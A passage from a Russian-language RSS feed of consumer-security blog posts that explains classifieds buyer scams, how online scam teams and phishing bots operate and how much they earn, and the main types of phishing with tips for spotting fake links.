  <p id="nkWV">В отличие от предыдущей схемы мошеннику нужно стать не продавцом, а покупателем.</p>
  <p id="UhVA">Найдя объявление, мошенники делают вид крайне заинтересованного покупателя, выражая желание купить товар <em>с доставкой</em>. Переводя диалог в мессенджеры, (так как то же Авито предупреждает про фишинговые ссылки и блокирует аккаунт пользователя, отправившего данную ссылку) мошенник будет выманивать у нас <em>данные карты</em>.</p>
  <p id="zeVc">Как не попасться на фишинг, мы рассказывали в предыдущей <a href="https://teletype.in/@ibmasters/PytgCmAOFhN" target="_blank">статье</a>.</p>
  <p id="feLH">На случай возникновения вопросов продавца у мошенников есть базовые <em>заготовленные ответы и письма на электронную почту</em>. Примеры:</p>
  <figure id="nt0v" class="m_column">
    <img src="https://img1.teletype.in/files/c0/59/c059de71-bd30-4874-b077-bb81b3b429f6.png" width="758" />
  </figure>
  <figure id="HENg" class="m_column">
    <img src="https://img2.teletype.in/files/d7/0f/d70f2ad0-6889-419a-8d56-a4dd930f1ea1.jpeg" width="974" />
  </figure>
  <p id="NvMM">Как мы уже сказали, аналогичные схемы существуют и для других площадок: OLX, Куфар, Юла и многих других. Для примера ниже приведен скриншот с площадки Юла:</p>
  <figure id="3IVT" class="m_column">
    <img src="https://img1.teletype.in/files/ca/d1/cad17994-f0f8-403c-8d13-5c66c88e424d.jpeg" width="974" />
  </figure>
  <p id="G3cy">В будущем, мы подготовим статьи про способы мошенничества на сервисах аренды гостиниц и авто.</p>
  <p id="NnVf"><strong>Будьте внимательны, ведь личная безопасность каждого находится в первую очередь в его руках. Подписывайтесь на канал и узнавайте, как обезопасить себя от мошенников.</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ibmasters/JOhzRXq0b6B</guid><link>https://teletype.in/@ibmasters/JOhzRXq0b6B?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters</link><comments>https://teletype.in/@ibmasters/JOhzRXq0b6B?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters#comments</comments><dc:creator>ibmasters</dc:creator><title>Скам-команды</title><pubDate>Mon, 11 Oct 2021 19:58:28 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/b6/2b/b62b6f55-b423-476b-ad91-f6e04a3a72d7.jpeg"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg"></img>Сегодня мы расскажем о самом распространенном методе получения наших денег - обычном интернет-мошенничестве. Данная статья является первой частью, и нацелена показать масштабы данного сегмента не только в СНГ, но и в странах Европы и США.]]></description><content:encoded><![CDATA[
  <p id="dxQj">Сегодня мы расскажем о самом распространенном методе получения наших денег - <em>обычном интернет-мошенничестве</em>. Данная статья является первой частью, и нацелена показать масштабы данного сегмента не только в СНГ, но и в странах Европы и США.</p>
  <p id="hKQi"></p>
  <blockquote id="VRsR"><strong>Дисклеймер. Все материалы представлены исключительно в ознакомительных целях, авторы ни в коем случае не призывают заниматься мошенничеством и всячески его порицают.</strong></blockquote>
  <p id="4Ngg"></p>
  <figure id="yIvq" class="m_column">
    <img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg" width="1200" />
  </figure>
  <p id="0Y0d">Для начала разберем структуру команды скаммеров:</p>
  <ol id="xvlD">
    <li id="fXyc"><em><u>ТС</u></em> - создатель команды, или один из создателей. Человек, который вложил свои средства в разработку программной части проекта. Специальные боты, домены, хостинги, выделенные серверы, сайты, закуп или же создание мерчей;</li>
    <li id="SSxc"><em><u>Технари</u></em> – люди, которые непосредственно разрабатывают, и поддерживают все это в исправном состоянии;</li>
    <li id="FMng"><em><u>Модераторы</u></em> - как правило, тоже скаммеры, доверенные лица ТС для контроля событий в чате;</li>
    <li id="6PQI"><em><u>Воркеры</u></em> – люди которые приходят в команду в качестве «работников» для получения прибыли;</li>
  </ol>
  <p id="6ncL">В некоторых командах, присутствуют саппорты, если это касается скам проектов, в которых обман происходит посредством <em>сайтов-обменников</em> и т.д. для примера видим одну из таких команд ниже:</p>
  <figure id="u66a" class="m_column">
    <img src="https://img1.teletype.in/files/8d/48/8d482ad0-4d10-42b1-9885-8e2892ff9400.png" width="1090" />
  </figure>
  <p id="txLj">Направлений в данной сфере крайне много, ограничиваются они исключительно фантазией и умением человека. На данный момент, активно работают по направлением бордов предоставления услуг продажи/работы: Авито, Юла, Боксберри, ОЛХ, Куфар, Blablacar и т.д.</p>
  <h2 id="OWcl">Принципы работы</h2>
  <p id="wjdT">Для примера возьмем функционал одного из ботов и рассмотрим его поближе.</p>
  <p id="JhKx">Выберем страну, например, Республику Беларусь.</p>
  <figure id="BimE" class="m_custom">
    <img src="https://img2.teletype.in/files/56/8d/568d2386-e3c5-4e48-8339-eae2633a8189.png" width="293" />
  </figure>
  <p id="45Uv">Наблюдаем подобный функционал, разницу в «версиях» рассмотрим в следующей статье.</p>
  <p id="fdNK">Выберем Куфар 2.0, и зайдя на сайт выбираем случайную публикацию. Одна из самых распространенной категорий скама – смартфоны iPhone.</p>
  <p id="dNWO">Вот ее содержание:</p>
  <figure id="iJx6" class="m_column">
    <img src="https://img2.teletype.in/files/de/e4/dee4d0a2-9f05-46c5-8ddd-3725ff80855e.png" width="1101" />
  </figure>
  <p id="y0w3">Далее проходит некоторое подобие заполнения «анкеты» скам-товара:</p>
  <figure id="tXUn" class="m_custom">
    <img src="https://img4.teletype.in/files/39/37/3937fe4a-bc56-47d5-98ec-feb348325fd7.png" width="547" />
  </figure>
  <p id="Wmqp">Ссылки не замазаны специально, дабы на основе прошлой <a href="https://teletype.in/@ibmasters/PytgCmAOFhN" target="_blank">статьи</a> вы могли наглядно увидеть, что эти ссылки – <em>фишинговые</em>, и не ведут на стандартные страницы проведения платежа. Переходим по ссылке и видим в точности скопированный дизайн, однако данные те, которые мы ввели:</p>
  <figure id="5V9t" class="m_column">
    <img src="https://img4.teletype.in/files/b7/a8/b7a84c19-e24d-4ed2-bfd5-4fed284fae1f.png" width="1917" />
  </figure>
  <p id="okvU">После этого в боте мы увидим это:</p>
  <figure id="Pqa4" class="m_original">
    <img src="https://img4.teletype.in/files/b9/ac/b9acc149-7ecb-4a75-876e-8b200c9f0644.png" width="463" />
  </figure>
  <p id="rDRW">Ради интереса пишем в «поддержку» на сайте, протестить функционал, и отвечаем в боте:</p>
  <figure id="t7JS" class="m_original">
    <img src="https://img4.teletype.in/files/77/20/7720987f-f242-4be4-952e-881878817b55.png" width="457" />
  </figure>
  <p id="PHQX"></p>
  <figure id="yLW3" class="m_column">
    <img src="https://img2.teletype.in/files/dc/03/dc0368e7-d814-49e4-b221-be8ae955803e.png" width="1507" />
  </figure>
  <p id="zytF">Функционал впечатляет, не правда ли? А ведь это только <em>вершина айсберга</em>. Впрочем, подробнее про методы мошенничества мы поговорим в следующей статье. А сейчас рассмотрим то, сколько же денег теряют доверчивые люди.</p>
  <h2 id="slRg">Масштабы бедствия</h2>
  <p id="4OLL">Для примера, возьмем все ту же Республику Беларусь</p>
  <figure id="k8E1" class="m_original">
    <img src="https://img1.teletype.in/files/4f/3f/4f3fe115-bd19-4a27-b40f-9dbf8ef3f3e4.png" width="216" />
  </figure>
  <p id="tjSV">Рассматриваемая нами команда появилась около года назад, однако уже сейчас ее ТОП воркеров по прибыли <em>по одной только РБ</em> впечатляет, не правда ли? Особенно если перевести в рубли и получить профит первого места 2 208 296 рублей. А только 10 человек, которые сидят в топе, суммарно получили 11 449 116 рублей. <em>Одиннадцать миллионов рублей</em>, только по Республике Беларусь.</p>
  <p id="4MqO">Если думаете, что в России объемы меньше, то вы ошибаетесь:</p>
  <figure id="GYjv" class="m_column">
    <img src="https://img1.teletype.in/files/c1/30/c130e28d-555c-41d4-af85-f3112b4cc5ed.png" width="889" />
  </figure>
  <p id="wEOq">Подробнее статью из скриншота выше вы можете прочитать по <a href="https://www.forbes.ru/newsroom/finansy-i-investicii/413309-eksperty-ocenili-obem-moshennichestva-za-god-na-servisah" target="_blank">ссылке.</a></p>
  <p id="HrB4">Ниже будут скриншот из этой же команды по некоторым странам ЕС. Это можно будет заметить из стилистики сообщения Id (внутри самой команды, который выдает бот):</p>
  <figure id="hBwC" class="m_original">
    <img src="https://img2.teletype.in/files/d0/76/d076c418-a206-40f1-9b60-8515e6ce8841.png" width="211" />
  </figure>
  <p id="ZbJt">На данном скриншоте мы видим прибыль всего лишь топа воркеров по данным странам. Профит по Польше: <em>32 106 399</em> рублей и по Португалии:<em> 11 197 334</em> рубля.</p>
  <p id="iHnR">Итак, оценив масштабы процветания скам-проектов, вы наверняка задались вопросом, <em>как же не попасться на уловки мошенников и сохранить свои средства</em>. Об этом мы расскажем в следующей статье, посвященной классическим схемам мошенников.</p>
  <p id="jbt9"><strong>Подписывайтесь на наш канал, чтобы не стать жертвой злоумышленников. Помните, предупрежден - значит вооружен. </strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ibmasters/PytgCmAOFhN</guid><link>https://teletype.in/@ibmasters/PytgCmAOFhN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters</link><comments>https://teletype.in/@ibmasters/PytgCmAOFhN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters#comments</comments><dc:creator>ibmasters</dc:creator><title>Фишинг</title><pubDate>Fri, 08 Oct 2021 13:21:25 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/b6/2b/b62b6f55-b423-476b-ad91-f6e04a3a72d7.jpeg"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg"></img>Сегодня мы рассмотрим один из примитивнейших для злоумышленника способов получения наших персональных данных, в частности данные авторизации на различных интернет-сервисах, номера банковских карт, а в некоторых случаях даже данных гражданства страны (паспорт, ВУ и т.д.)]]></description><content:encoded><![CDATA[
  <p id="docs-internal-guid-9973ad09-7fff-9bcb-80e3-635dc0070959">Сегодня мы рассмотрим один из примитивнейших для злоумышленника способов получения наших персональных данных, в частности <em>данные авторизации</em> на различных интернет-сервисах, <em>номера банковских карт</em>, а в некоторых случаях даже <em>данных гражданства страны</em> (паспорт, ВУ и т.д.)</p>
  <figure id="c40Y" class="m_column">
    <img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg" width="1200" />
  </figure>
  <p id="hi7B">Фишинговые мошенники не пытаются воспользоваться техническими уязвимостями в операционной системе устройства, они прибегают к методам так называемой социальной инженерии. От Windows и Android до Mac и iPhone,  – <em>ни одна операционная система не обладает полной защитой от фишинга</em>, какими бы мощными ни были ее антивирусные средства. В действительности злоумышленники часто прибегают к фишингу, потому что не могут найти какие-либо технические уязвимости. Зачем тратить время на взлом многоуровневой защиты, когда можно обманным путем заставить пользователя добровольно раскрыть свои данные? </p>
  <p id="sXdF"><strong>В большинстве случаев самым слабым звеном в защите системы является не ошибки в коде, а сам пользователь, который не соблюдает элементарных правил безопасности.</strong></p>
  <p id="Cg4f">На данный момент, существует несколько типов фишинга.</p>
  <h2 id="Jd5A">Адресный фишинг.</h2>
  <p id="jEEz">Вид фишинга который подразумевает атаку <em>на конкретного пользователя или организацию</em>. В данном случае мошенники часто применяют специально подобранный контент, который, как им представляется, окажет на жертву наибольшее воздействие. Для осуществления подобной атаки необходимо провести тщательную подготовку, чтобы узнать имена, должности, адреса электронной почты и другую сопутствующую информацию. Злоумышленники переворачивают вверх дном весь Интернет, сопоставляя эту информацию со всеми доступными сведениями о должностных отношениях жертвы: например, их интересуют имена коллег и круг их обязанностей в соответствующей организации. Заполучив все эти данные, злоумышленники составляют правдоподобное письмо.</p>
  <p id="htQr">Для примера, подобная атака может производиться на сотрудника бухгалтерии, который отвечает за денежные операции предприятия, когда ему пишут запрос от якобы вышестоящего руководства о переводе средств на такие-то реквизиты, или на специалистов технической поддержки бухгалтерского софта, отправляя им письмо с просьбой установить апдейт и прикрепленным файлом.</p>
  <p id="jJVU">Производя переход по ссылке – сотрудник может ввести <em>личные данные авторизации</em>, или же дать разрешения сайту, тем самым <em>позволив ему выполнить вредоносные сценарии.</em></p>
  <p id="gTjH">Устанавливая файл из подобного письма сотрудник сам заражает свою систему. Все логично, и просто, однако, этот метод редко применяется на обычных людей, так сказать, на широкую публику.</p>
  <p id="DPmV">В основном, это угроза для бизнеса, и даже целого государства. К примеру, в США <em>средняя величина ущерба от фишинга около 1.5 млн. долларов</em> на одну успешную атаку.</p>
  <h2 id="gJyr">Клоновый фишинг.</h2>
  <p id="I9bf">Данный вид фишинга ориентируется на <em>работу с массами</em>, заменой привычных нам электронных писем от соцсетей и их рассылкой. Зачастую выгодно заразить один ПК и, получив доступ к почте, <em>раскинуть спам по адресатам уже от имени доверенного пользователя</em>. Данный вид фишинга более распространен и нацелен на общий объем получаемых данных, нежели потенциальную прибыль от одного пострадавшего.</p>
  <h2 id="lsJ7">Телефонный фишинг.</h2>
  <p id="lK42">По факту, это обычные звонки от «сотрудников банка» с которыми наверняка сталкивалось большинство. Очевидно, что данным методом у нас будут пытаться узнать данные карт и банковских аккаунтов, <em>прикрывая это заботой о сохранности наших финансов.</em></p>
  <h2 id="Ewmx">Нигерийский фишинг.</h2>
  <p id="BROT">Да, несколько экзотическое название, но такое название имеет так как метод достаточно дубовый, и нацелен на совсем наивных людей, которые <em>верят в счастье, упавшее сверху.</em></p>
  <p id="pGms">Данный вид фишинга напоминает старую рекламу «Invite - просто добавь воды». Выглядит вкусно, а по факту вреда больше, чем чего-либо другого. Он заключается в убеждении человека, что тот получил вознаграждение за помощь в переводе\хранении денег из-за границы у себя на счету, а для получения этого вознаграждения всего-то нужно отправить <em>данные своего банковского счета</em>. Письмо будет, к примеру, от какого-то нигерийского принца или госслужащего. Выглядит до неприличия странно, но есть те, кто ведется.</p>
  <p id="lCnx"></p>
  <h2 id="4QZx">Защита от фишинга</h2>
  <p id="8wjL">Раз мы узнали, какие виды фишинга могут встретиться, пора познакомиться и с методами их распознания. Вот основные признаки фишингово письма:</p>
  <ol id="GJAE">
    <li id="Qkce"><strong>Информация выглядит подозрительно</strong>, пытается давить на страх, или создать тревожную атмосферу, к примеру информация про блокировку банковского счета, непредвиденные транзакции, или же письмо от близкого человека, который почти никогда с вами не общался подобным образом. <em>Чем больше вы встревожены, тем вас легче подсадить на крючок.</em></li>
    <li id="Gxpa"><strong>Письмо на почте содержит вложение, или ссылки</strong>. Если приходится часто иметь с этим дело – привыкайте <em>проверять адреса ссылок</em>, на правильность введенных букв доменного именного имени и доменной зоны. К примеру, если письмо от Facebook, то ссылка должна быть <a href="https://facebook.com" target="_blank">https://facebook.com</a> но не в коем случае <a href="https://facebok.com" target="_blank">https://facebok.com</a> или  <a href="https://facebok.com.ru" target="_blank">https://facebok.com.ru</a> и т.д.</li>
    <li id="8FxG"><strong>В письме используются гиперссылки</strong>. Для их проверки просто наведите на них курсор, и внизу экрана мы увидим ссылку, на которую она ведет. Для примера, скриншот из интернета:</li>
  </ol>
  <figure id="AccP" class="m_custom">
    <img src="https://lh4.googleusercontent.com/pLdAjg1Vwkyp5zrMD07m_GliWXoC7qOe6PFs5-7aFTE_TIeZ4_dH7DCLHSGU1ap5fb9vGpxQUewJw6FbP1bTawf_B8m8V8_E2KLZQhtuqiiovHK8A0Yv36M4bWmpMqgCwFruClw=s0" width="537" />
  </figure>
  <p id="TNDr">На этом скриншоте видно письмо от PayPal с <em>просьбой подтвердить наличие доступа к аккаунту.</em> При наведении на кнопку «Confirm now» внизу слева (обведено красным контуром) видим ссылку, на которую нас перекинет при нажатии. И вместо привычного <a href="https://paypal.com" target="_blank">https://paypal.com</a> мы наблюдаем <a href="https://m" target="_blank">https://m</a> y sp [.] ac.</p>
  <p id="d29l"><strong>В ссылке специально вставлены пробелы, чтобы обезопасить вас от случайного нажатия. Ни в коем случае не переходите по этой ссылке!</strong></p>
  <p id="xDhj">Таким образом можно проверить любую гиперссылку.</p>
  <p id="78ka"></p>
  <p id="eevg">Если вы не используете антивирус для своего устройства, установите хотя бы <em>решение Internet Security</em> от любого понравившегося производителя ПО. Большинство фишинговых сайтов будут отсечены при попытке перехода на них.</p>
  <p id="1DN4"><strong>Помните, самая большая угроза для системы всегда находится перед монитором. Подписывайтесь на канал, вас ждет еще много полезного материала.</strong></p>

]]></content:encoded></item></channel></rss>